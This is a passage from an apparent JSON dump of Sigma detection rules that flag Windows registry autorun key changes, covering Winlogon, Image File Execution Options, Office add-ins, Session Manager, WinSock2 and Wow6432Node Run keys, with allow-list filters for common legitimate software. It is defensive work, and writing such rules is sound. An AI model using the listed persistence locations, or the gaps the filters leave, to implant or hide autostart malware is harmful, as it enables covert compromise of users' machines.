Signal (Phone proximity, Network location)\n    filter_main_edge:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\'\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\'\n            - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_main_defender:\n        Image: 'C:\\Program Files\\Windows Defender\\MsMpEng.exe'\n    filter_main_teams:\n        Image|endswith: '\\Microsoft\\Teams\\current\\Teams.exe'\n        Details|contains: '\\Microsoft\\Teams\\Update.exe --processStart '\n    filter_main_ctfmon:\n        Image: 'C:\\Windows\\system32\\userinit.exe'\n        Details: 'ctfmon.exe /n'\n    filter_optional_dropbox:\n        Image: 'C:\\Windows\\system32\\regsvr32.exe'\n        TargetObject|contains: 'DropboxExt'\n        Details|endswith: 'A251-47B7-93E1-CDD82E34AF8B}'\n    filter_optional_opera_1:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Browser Assistant'\n        Details: 'C:\\Program Files\\Opera\\assistant\\browser_assistant.exe'\n    filter_optional_opera_2:\n        TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Stable'\n        Details:\n            - 'C:\\Program Files\\Opera\\launcher.exe'\n            - 'C:\\Program Files (x86)\\Opera\\launcher.exe'\n    filter_optional_itunes:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\iTunesHelper'\n        Details: '\"C:\\Program Files\\iTunes\\iTunesHelper.exe\"'\n    filter_optional_zoom:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zoommsirepair'\n        Details: '\"C:\\Program Files\\Zoom\\bin\\installer.exe\" /repair'\n    filter_optional_greenshot:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Greenshot'\n        Details: 'C:\\Program Files\\Greenshot\\Greenshot.exe'\n    filter_optional_googledrive1:\n        TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleDriveFS'\n        Details|startswith: 'C:\\Program Files\\Google\\Drive File Stream\\'\n        Details|contains: '\\GoogleDriveFS.exe'\n    filter_optional_googledrive2:\n        TargetObject|contains: 'GoogleDrive'\n        Details:\n            - '{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}'\n            - '{A8E52322-8734-481D-A7E2-27B309EF8D56}'\n            - '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}'\n            - '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}'\n    filter_optional_onedrive:\n        Details|startswith:\n            - 'C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \"C:\\Users\\'\n            - 'C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\'\n        Details|contains: '\\AppData\\Local\\Microsoft\\OneDrive\\'\n    filter_optional_python:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{'\n        Details|contains|all:\n            - '\\AppData\\Local\\Package Cache\\{'\n            - '}\\python-'\n        Details|endswith: '.exe\" /burn.runonce'\n    filter_optional_officeclicktorun:\n        Image|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n            - 'C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\ClickToRun\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_optional_teams:\n        Image|endswith: '\\Microsoft\\Teams\\current\\Teams.exe'\n        Details|contains: '\\Microsoft\\Teams\\Update.exe --processStart'\n    filter_optional_AVG_setup:\n        Image|contains:\n            - 'C:\\Program Files\\AVG\\Antivirus\\Setup\\'\n            - 'C:\\Program Files (x86)\\AVG\\Antivirus\\Setup\\'\n            - '\\instup.exe'\n        Details:\n            - '\"C:\\Program Files\\AVG\\Antivirus\\AvLaunch.exe\" /gui'\n            - '\"C:\\Program Files (x86)\\AVG\\Antivirus\\AvLaunch.exe\" /gui'\n            - '{472083B0-C522-11CF-8763-00608CC02F24}'\n            - '{472083B1-C522-11CF-8763-00608CC02F24}'\n    filter_optional_Avast:\n        Image|contains:\n            - 'C:\\Program Files\\Avast Software\\Avast\\Setup\\'\n            - 'C:\\Program Files (x86)\\Avast Software\\Avast\\Setup\\'\n            - '\\instup.exe'\n        Details:\n            - '\"C:\\Program Files\\Avast Software\\Avast\\AvLaunch.exe\" /gui'\n            - '\"C:\\Program Files (x86)\\Avast Software\\Avast\\AvLaunch.exe\" /gui'\n    filter_optional_AVG_avgtoolsvc:\n        Image:\n            - 'C:\\Program Files\\AVG\\Antivirus\\avgToolsSvc.exe'\n            - 'C:\\Program Files (x86)\\AVG\\Antivirus\\avgToolsSvc.exe'\n        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run\\'\n        Details: 'Binary Data'\n    filter_optional_aurora_dashboard:\n        Image|endswith:\n            - '\\aurora-agent-64.exe'\n            - '\\aurora-agent.exe'\n        TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Run\\aurora-dashboard'\n        Details: 'C:\\Program Files\\Aurora-Agent\\tools\\aurora-dashboard.exe'\n    filter_optional_everything:\n        TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Run\\Everything'\n        Details|endswith: '\\Everything\\Everything.exe\" -startup' # We remove the starting part as it could be installed in different locations\n    filter_optional_discord:\n        TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord'\n        Details|endswith: '\\Discord\\Update.exe --processStart Discord.exe'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml",
    "content": "title: CurrentVersion NT Autorun Keys Modification\nid: cbf93e5d-ca6c-4722-8bea-e9119007c248\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_nt_current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'\n    selection_nt_current_version:\n        TargetObject|contains:\n            - '\\Winlogon\\VmApplet'\n            - '\\Winlogon\\Userinit'\n            - '\\Winlogon\\Taskman'\n            - '\\Winlogon\\Shell'\n            - '\\Winlogon\\GpExtensions'\n            - '\\Winlogon\\AppSetup'\n            - '\\Winlogon\\AlternateShells\\AvailableShells'\n            - '\\Windows\\IconServiceLib'\n            - '\\Windows\\Appinit_Dlls'\n            - '\\Image File Execution Options' # Covered in better details in 36803969-5421-41ec-b92f-8500f79c23b0\n            - '\\Font Drivers'\n            - '\\Drivers32'\n            - '\\Windows\\Run'\n            - '\\Windows\\Load'\n    filter_main_empty:\n        Details: '(Empty)'\n    filter_main_null:\n        Details: null\n    filter_main_poqexec:\n        Image: 'C:\\Windows\\System32\\poqexec.exe'\n    filter_main_legitimate_subkey:  # Legitimately used subkeys of \\Image File Execution Options, which are not used for persistence (see https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)\n        TargetObject|contains: '\\Image File Execution Options\\'\n        TargetObject|endswith:\n            - '\\DisableExceptionChainValidation'\n            - '\\MitigationOptions'\n    filter_main_security_extension_dc:\n        Image: 'C:\\Windows\\system32\\svchost.exe'\n        TargetObject|contains:\n            - '\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\PreviousPolicyAreas'\n            - '\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\MaxNoGPOListChangesInterval'\n        Details:\n            - 'DWORD (0x00000001)'\n            - 'DWORD (0x00000009)'\n            - 'DWORD (0x000003c0)'\n    filter_main_runtimebroker:\n        Image: 'C:\\Windows\\System32\\RuntimeBroker.exe'\n        TargetObject|contains: '\\runtimebroker.exe\\Microsoft.Windows.ShellExperienceHost'\n    filter_optional_edge:\n        Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\Temp\\'\n        Image|endswith: '\\MicrosoftEdgeUpdate.exe'\n    filter_optional_avguard:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Avira\\Antivirus\\avguard.exe'\n            - 'C:\\Program Files\\Avira\\Antivirus\\avguard.exe'\n        TargetObject|contains: 'SOFTWARE\\WOW6432Node\\Avira\\Antivirus\\Overwrite_Keys\\HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\'\n        TargetObject|endswith:\n            - '\\userinit\\UseAsDefault'\n            - '\\shell\\UseAsDefault'\n        Details:\n            - 'explorer.exe'\n            - 'C:\\Windows\\system32\\userinit.exe,'\n    filter_optional_msoffice:\n        - TargetObject|contains:\n              - '\\ClickToRunStore\\HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\'\n              - '\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\'\n        - Image:\n              - 'C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe'\n              - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe'\n    filter_optional_officeclicktorun:\n        Image|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_optional_ngen:\n        Image|startswith: 'C:\\Windows\\Microsoft.NET\\Framework'\n        Image|endswith: '\\ngen.exe'\n    filter_optional_onedrive:\n        Image|endswith: '\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe'\n        TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary'\n        Details|startswith: 'C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\'\n        Details|endswith: '\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml",
    "content": "title: Internet Explorer Autorun Keys Modification\nid: a80f662f-022f-4429-9b8c-b1a41aaa6688\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    ie:\n        TargetObject|contains:\n            - '\\Software\\Wow6432Node\\Microsoft\\Internet Explorer'\n            - '\\Software\\Microsoft\\Internet Explorer'\n    ie_details:\n        TargetObject|contains:\n            - '\\Toolbar'\n            - '\\Extensions'\n            - '\\Explorer Bars'\n    filter_empty:\n        Details: '(Empty)'\n    filter_extensions:\n        TargetObject|contains:\n            - '\\Extensions\\{2670000A-7350-4f3c-8081-5663EE0C6C49}'\n            - '\\Extensions\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}'\n            - '\\Extensions\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}'\n            - '\\Extensions\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}'\n    filter_toolbar:\n        TargetObject|endswith:\n            - '\\Toolbar\\ShellBrowser\\ITBar7Layout'\n            - '\\Toolbar\\ShowDiscussionButton'\n            - '\\Toolbar\\Locked'\n    condition: ie and ie_details and not 1 of filter_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml",
    "content": "title: Office Autorun Keys Modification\nid: baecf8fb-edbf-429f-9ade-31fc3f22b970\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2025-10-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_office_root:\n        TargetObject|contains:\n            - '\\Software\\Wow6432Node\\Microsoft\\Office'\n            - '\\Software\\Microsoft\\Office'\n    selection_office_details:\n        TargetObject|contains:\n            - '\\Word\\Addins'\n            - '\\PowerPoint\\Addins'\n            - '\\Outlook\\Addins'\n            - '\\Onenote\\Addins'\n            - '\\Excel\\Addins'\n            - '\\Access\\Addins'\n            - 'test\\Special\\Perf'\n    filter_main_empty:\n        Details: '(Empty)'\n    filter_main_known_addins:\n        Image|startswith:\n            - 'C:\\Program Files\\Microsoft Office\\'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\'\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\Windows\\System32\\regsvr32.exe'\n        TargetObject|contains:\n            # Remove any unused addins in your environment from the filter\n            # Known addins for excel\n            - '\\Excel\\Addins\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\'\n            - '\\Excel\\Addins\\ExcelPlugInShell.PowerMapConnect\\'\n            - '\\Excel\\Addins\\NativeShim\\'\n            - '\\Excel\\Addins\\NativeShim.InquireConnector.1\\'\n            - '\\Excel\\Addins\\PowerPivotExcelClientAddIn.NativeEntry.1\\'\n            # Known addins for outlook\n            - '\\Outlook\\AddIns\\AccessAddin.DC\\'\n            - '\\Outlook\\AddIns\\ColleagueImport.ColleagueImportAddin\\'\n            - '\\Outlook\\AddIns\\EvernoteCC.EvernoteContactConnector\\'\n            - '\\Outlook\\AddIns\\EvernoteOLRD.Connect\\'\n            # - '\\Outlook\\Addins\\GrammarlyAddIn.Connect' # Uncomment if you use Grammarly\n            - '\\Outlook\\Addins\\Microsoft.VbaAddinForOutlook.1\\'\n            - '\\Outlook\\Addins\\OcOffice.OcForms\\'\n            - '\\Outlook\\Addins\\\\OneNote.OutlookAddin'\n            - '\\Outlook\\Addins\\OscAddin.Connect\\'\n            - '\\Outlook\\Addins\\OutlookChangeNotifier.Connect\\'\n            - '\\Outlook\\Addins\\UCAddin.LyncAddin.1'\n            - '\\Outlook\\Addins\\UCAddin.UCAddin.1'\n            - '\\Outlook\\Addins\\UmOutlookAddin.FormRegionAddin\\'\n            - 'AddinTakeNotesService\\FriendlyName'\n    filter_main_officeclicktorun:\n        Image|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_optional_avg:\n        Image:\n            - 'C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe'\n            - 'C:\\Program Files\\AVG\\Antivirus\\x86\\RegSvr.exe'\n        TargetObject|contains: '\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt\\'\n    filter_optional_avast:\n        Image:\n            - 'C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe'\n            - 'C:\\Program Files\\Avast Software\\Avast\\x86\\RegSvr.exe'\n        TargetObject|contains: '\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt\\'\n    condition: all of selection_office_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml",
    "content": "title: Session Manager Autorun Keys Modification\nid: 046218bd-e0d8-4113-a3c3-895a12b2b298\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - attack.t1546.009\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    session_manager_base:\n        TargetObject|contains: '\\System\\CurrentControlSet\\Control\\Session Manager'\n    session_manager:\n        TargetObject|contains:\n            - '\\SetupExecute'\n            - '\\S0InitialCommand'\n            - '\\KnownDlls'\n            - '\\Execute'\n            - '\\BootExecute'\n            - '\\AppCertDlls'\n    filter:\n        Details: '(Empty)'\n    condition: session_manager_base and session_manager and not filter\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml",
    "content": "title: System Scripts Autorun Keys Modification\nid: e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    scripts_base:\n        TargetObject|contains: '\\Software\\Policies\\Microsoft\\Windows\\System\\Scripts'\n    scripts:\n        TargetObject|contains:\n            - '\\Startup'\n            - '\\Shutdown'\n            - '\\Logon'\n            - '\\Logoff'\n    filter:\n        Details: '(Empty)'\n    condition: scripts_base and scripts and not filter\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml",
    "content": "title: WinSock2 Autorun Keys Modification\nid: d6c2ce7e-afb5-4337-9ca4-4b5254ed0565\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: derived\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    winsock_parameters_base:\n        TargetObject|contains: '\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters'\n    winsock_parameters:\n        TargetObject|contains:\n            - '\\Protocol_Catalog9\\Catalog_Entries'\n            - '\\NameSpace_Catalog5\\Catalog_Entries'\n    filter:\n        - Details: '(Empty)'\n        - Image: 'C:\\Windows\\System32\\MsiExec.exe'\n        - Image: 'C:\\Windows\\syswow64\\MsiExec.exe'\n    condition: winsock_parameters_base and winsock_parameters and not filter\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml",
    "content": "title: Wow6432Node CurrentVersion Autorun Keys Modification\nid: b29aed60-ebd1-442b-9cb5-16a1d0324adb\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\n    - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2025-12-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_wow_current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion'\n    selection_wow_current_version_keys:\n        TargetObject|contains:\n            - '\\ShellServiceObjectDelayLoad'\n            - '\\Run\\'\n            - '\\RunOnce\\'\n            - '\\RunOnceEx\\'\n            - '\\RunServices\\'\n            - '\\RunServicesOnce\\'\n            - '\\Explorer\\ShellServiceObjects'\n            - '\\Explorer\\ShellIconOverlayIdentifiers'\n            - '\\Explorer\\ShellExecuteHooks'\n            - '\\Explorer\\SharedTaskScheduler'\n            - '\\Explorer\\Browser Helper Objects'\n    filter_main_empty:\n        Details: '(Empty)'\n    filter_main_null:\n        Details: null\n    filter_main_ms_win_desktop_runtime:\n        Details|startswith: '\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-'\n    filter_main_vcredist:\n        Image|endswith: '\\VC_redist.x64.exe'\n        Details|endswith: '}\\VC_redist.x64.exe\" /burn.runonce'\n    filter_main_upgrades:\n        Image|startswith:\n            - 'C:\\ProgramData\\Package Cache'\n            - 'C:\\Windows\\Temp\\'\n        Image|contains:\n            - '\\winsdksetup.exe'\n            - '\\windowsdesktop-runtime-'  # C:\\WINDOWS\\Temp\\{751E2E78-46DC-4376-9205-99219CDC34AE}\\.be\\windowsdesktop-runtime-6.0.12-win-x86.exe\n            - '\\AspNetCoreSharedFrameworkBundle-'  # \"C:\\ProgramData\\Package Cache\\{b52191c1-a9c0-4b34-9a4e-930c2dd8a540}\\AspNetCoreSharedFrameworkBundle-x86.exe\" /burn.runonce\n        Details|endswith: ' /burn.runonce'\n    filter_main_uninstallers:\n        # This image path is linked with different uninstallers when running as admin unfortunately\n        Image|startswith: 'C:\\Windows\\Installer\\MSI'\n        TargetObject|contains: '\\Explorer\\Browser Helper Objects'\n    filter_main_msiexec:\n        Image: 'C:\\WINDOWS\\system32\\msiexec.exe'\n        TargetObject|contains: '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n    filter_main_edge:\n        Image|contains|all:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{'\n            - '\\setup.exe'\n    filter_optional_msoffice1:\n        Image: 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe'\n        TargetObject|contains: '\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node\\'\n    filter_optional_msoffice2:\n        Image:\n            - 'C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe'\n        TargetObject|contains: '\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\'\n    filter_optional_dropbox:\n        - Details|endswith: '-A251-47B7-93E1-CDD82E34AF8B}'\n        - Details: 'grpconv -o'\n        - Details|contains|all:\n              - 'C:\\Program Files'\n              - '\\Dropbox\\Client\\Dropbox.exe'\n              - ' /systemstartup'\n    filter_optional_evernote:\n        TargetObject|endswith: '\\Explorer\\Browser Helper Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer'\n    filter_optional_dotnet:\n        Image|contains: '\\windowsdesktop-runtime-'\n        TargetObject|endswith:\n            - '\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}'\n            - '\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}'\n        Details|startswith: '\"C:\\ProgramData\\Package Cache\\'\n        Details|endswith: '.exe\" /burn.runonce'\n    filter_optional_office:\n        Image|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_optional_discord:\n        TargetObject|endswith: '\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord'\n        Details|endswith: 'Discord.exe --checkInstall'\n    filter_optional_avira:\n        Details|endswith: '\\Avira.OE.Setup.Bundle.exe\" /burn.runonce'\n        Image|endswith: '\\Avira.OE.Setup.Bundle.exe'\n    filter_optional_avg_1:\n        Image|endswith: '\\instup.exe'\n        TargetObject|endswith: '\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\AvRepair'\n        Details|endswith: 'instup.exe\" /instop:repair /wait'\n    filter_optional_avg_2:\n        Image|endswith: '\\instup.exe'\n        TargetObject|endswith:\n            - '\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00avg\\(Default)'\n            - '\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00asw\\(Default)'\n        Details:\n            - '{472083B1-C522-11CF-8763-00608CC02F24}'\n            - '{472083B0-C522-11CF-8763-00608CC02F24}'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml",
